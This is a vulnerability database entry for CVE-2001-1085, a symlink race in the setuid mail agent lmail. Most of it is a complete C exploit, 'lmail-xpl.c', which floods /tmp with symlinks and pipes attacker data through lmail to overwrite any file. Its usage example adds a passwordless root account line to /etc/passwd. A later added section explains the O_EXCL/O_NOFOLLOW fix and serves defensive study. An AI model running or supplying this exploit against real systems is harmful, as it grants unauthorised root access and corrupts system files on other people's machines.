Lmail File Threat

Vulnerability ID 1106421 Vulnerability type Unknown
Published 2001-07-04 Updated 2005-05-02
CVE ID CVE-2001-1085
CNNVD-ID CNNVD-200107-055
Platform Linux CVSS score 3.7
|Vulnerability source
https://www.exploit-db.com/exploits/20992
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-055
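|Vulnerability details
Lmail 2.7 and earlier versions contain a vulnerability. A local user can overwrite arbitrary files by means of a link attack on temporary files.
|Exploit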
source: http://www.securityfocus.com/bid/2984/info

Jon Zeeff's lmail is a local mail delivery agent (LDA) designed to provide mail-to-pipe and mail-to-file aliasing for smail.

A race condition vulnerability exists in lmail. The lmail program makes insecure use of temporary files, making it susceptible to symbolic link attacks. The program also writes data from the standard input stream (stdin) directly to the temporary file.

Because lmail is usually installed setuid root, it may be possible for a local user to overwrite any file on a system with arbitrary data. 

/* lmail-xpl.c
 *
 * Quick hack to exploit lmail
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
 * $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <[email protected]>
 *
 * July 04 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 128

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   pid_t pid;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "lmail-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   pid = getpid();

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/lmail%d", pid+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}
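
The fix for the temporary-file handling described above, as an added example that is not lmail's source or part of the original advisory: a temp file opened without O_EXCL follows a symlink planted at its name, while an exclusive, no-follow open refuses it. The function names, the demo directory and the file name `lmail1234` are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern: guessable name, no O_EXCL. A symlink already sitting at
 * `path` is followed, and O_TRUNC empties whatever it points to. */
int open_tmp_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: fails with EEXIST if anything, a symlink included, is at `path`. */
int open_tmp_strict(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Helpers: (re)create the victim with 4 bytes; report a file's size. */
static void fill(const char *path) {
    FILE *f = fopen(path, "w");
    if (f) { fputs("keep", f); fclose(f); }
}
static long size_of(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Constructed self-check in a private mkdtemp() directory: a symlink sits at
 * the predictable name and points at `victim`. Returns a bitmask:
 * bit 0 = the weak opener emptied the victim, bit 1 = the strict opener did. */
int symlink_check(void) {
    char dir[] = "/tmp/tmpdemo.XXXXXX", victim[64], pred[64];
    int fd, mask = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(pred, sizeof pred, "%s/lmail1234", dir);   /* constructed name */
    fill(victim);
    if (symlink(victim, pred) != 0) return -1;
    if ((fd = open_tmp_weak(pred)) >= 0) close(fd);
    if (size_of(victim) != 4) mask |= 1;
    fill(victim);
    if ((fd = open_tmp_strict(pred)) >= 0) close(fd);
    if (fd >= 0 || size_of(victim) != 4) mask |= 2;
    unlink(pred); unlink(victim); rmdir(dir);
    return mask;
}

int main(void) { return symlink_check() == 1 ? 0 : 1; }
```

mkstemp(3) performs the same exclusive creation with an unpredictable name, so a pre-created file cannot make the open fail either. A setuid program should also drop privileges before writing user-supplied data.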
|References

Source: BUGTRAQ
Name: 20010705lmaillocalrootexploit
Link: http://www.securityfocus.com/archive/1/195022
Source: XF
Name: lmail-tmpfile-symlink(6809)
Link: http://xforce.iss.net/static/6809.php
Source: BID
Name: 2984
Link: http://www.securityfocus.com/bid/2984
